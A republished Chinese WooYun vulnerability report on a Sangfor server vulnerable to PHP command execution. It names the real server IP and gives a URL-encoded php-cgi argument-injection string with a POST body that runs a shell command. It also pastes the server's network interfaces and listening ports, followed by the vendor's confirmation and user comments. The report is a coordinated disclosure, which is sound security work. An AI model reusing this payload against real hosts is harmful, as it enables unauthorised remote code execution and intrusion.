深信服某服务器存在php命令执行

admin
admin
admin
139627
文章
114
评论
2017年4月22日12:16:33评论435 views字数 205阅读0分41秒阅读模式
摘要

2016-04-08: 细节已通知厂商并且等待厂商处理中
2016-04-11: 厂商已经确认,细节仅向厂商公开
2016-04-21: 细节向核心白帽子及相关领域专家公开
2016-05-01: 细节向普通白帽子公开
2016-05-11: 细节向实习白帽子公开
2016-05-26: 细节向公众公开

漏洞概要 关注数(58) 关注此漏洞

缺陷编号: WooYun-2016-193980

漏洞标题: 深信服某服务器存在php命令执行

相关厂商: 深信服

漏洞作者: Jannock深信服某服务器存在php命令执行

提交时间: 2016-04-08 18:00

公开时间: 2016-05-26 17:50

漏洞类型: 命令执行

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 远程代码执行

11人收藏

漏洞详情

披露状态:

2016-04-08: 细节已通知厂商并且等待厂商处理中
2016-04-11: 厂商已经确认,细节仅向厂商公开
2016-04-21: 细节向核心白帽子及相关领域专家公开
2016-05-01: 细节向普通白帽子公开
2016-05-11: 细节向实习白帽子公开
2016-05-26: 细节向公众公开

简要描述:

深信服某服务器存在php命令执行

详细说明:

网址:

http://202.131.75.66/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E

POST:

<?php echo system("ps aux");?>

漏洞证明:

深信服某服务器存在php命令执行

code 区域 
eth0      Link encap:Ethernet  HWaddr 6c:f0:49:aa:83:6d  
           inet addr:172.200.0.10  Bcast:172.200.0.255  Mask:255.255.255.0
           inet6 addr: fe80::6ef0:49ff:feaa:836d/64 Scope:Link
           UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
           RX packets:45705971 errors:0 dropped:0 overruns:0 frame:0
           TX packets:11507562 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000 
           RX bytes:2977449802 (2.9 GB)  TX bytes:2018109677 (2.0 GB)
           Interrupt:26 Base address:0xc000 
 
 lo        Link encap:Local Loopback  
           inet addr:127.0.0.1  Mask:255.0.0.0
           inet6 addr: ::1/128 Scope:Host
           UP LOOPBACK RUNNING  MTU:16436  Metric:1
           RX packets:35467 errors:0 dropped:0 overruns:0 frame:0
           TX packets:35467 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:0 
           RX bytes:2905574 (2.9 MB)  TX bytes:2905574 (2.9 MB)
code 区域 
Active Internet connections (servers and established)
 Proto Recv-Q Send-Q Local Address           Foreign Address         State      
 tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN     
 tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN     
 tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN     
 tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN     
 tcp        0      0 0.0.0.0:8088            0.0.0.0:*               LISTEN     
 tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN     
 tcp        0      0 172.200.0.10:80         172.200.0.254:56256     TIME_WAIT  
 tcp        0      0 172.200.0.10:80         172.200.0.254:56258     ESTABLISHED
 tcp        0      0 172.200.0.10:80         172.200.0.254:56254     TIME_WAIT  
 tcp        0      0 172.200.0.10:52369      195.10.212.160:2087     ESTABLISHED
 tcp6       0      0 :::22                   :::*                    LISTEN     
 tcp6       0      0 :::22                   :::*                    LISTEN

修复方案:

打补丁

版权声明:转载请注明来源 Jannock@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-11 17:48

厂商回复:

感谢白帽子提交的问题。经确认,该问题确实存在。该服务器是我们区域自行搭建的渠道访问系统,目前正处于测试阶段, 5月份会发布正式版并进行安全维护,虽然该系统内部数据并不涉及核心业务,但此漏洞确实严重等级较高,综合考虑,我们给这个漏洞中危最高评级。
目前,该漏洞已经修复。
感谢白帽子为我们指出问题,请白帽子私信留下联系方式,我们将为您寄送礼物以示答谢!

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-04-08 18:03 | 小龙 ( 普通白帽子 | Rank:2794 漏洞数:546 | 我就问,还有谁!!!!!!!!!!!!!...)

    2

    活捉黑阔一枚,大家快来按住他,别让他跑了

  2. 2016-04-08 18:08 | _Thorns ( 普通白帽子 | Rank:1754 漏洞数:269 | 以大多数人的努力程度之低,根本轮不到去拼...)

    1

    一哥出现了!

  3. 2016-04-08 18:26 | whynot ( 普通白帽子 | Rank:678 漏洞数:136 | 为你解冻冰河 为你放弃世界有何不可)

    1

    前排留名

  4. 2016-04-08 18:27 | hecate ( 普通白帽子 | Rank:823 漏洞数:129 | ®高级安全工程师 | WooYun认证√)

    2

    123456

  5. 2016-04-08 18:31 | 子非海绵宝宝 深信服某服务器存在php命令执行 ( 核心白帽子 | Rank:1413 漏洞数:148 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)

    1

    目测要火,不知道有没有限制.

  6. 2016-04-08 18:34 | 东方先生 ( 路人 | Rank:13 漏洞数:9 | 高冷吴大神的腿)

    2

    这个要火啊

  7. 2016-04-08 22:32 | Yuku ( 实习白帽子 | Rank:58 漏洞数:27 | 数据挖掘)

    2

    已沦陷

  8. 2016-04-12 11:39 | waht000 ( 实习白帽子 | Rank:37 漏洞数:14 | 我还是太菜。。。)

    1

    一哥~~一哥~~

  9. 2016-05-28 07:35 | U神 ( 核心白帽子 | Rank:1375 漏洞数:153 | 乌云核心菜鸟,此号长期由联盟托管,如果近...)

    0

    擦,这是扫出来的吗,一哥 @Jannock

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin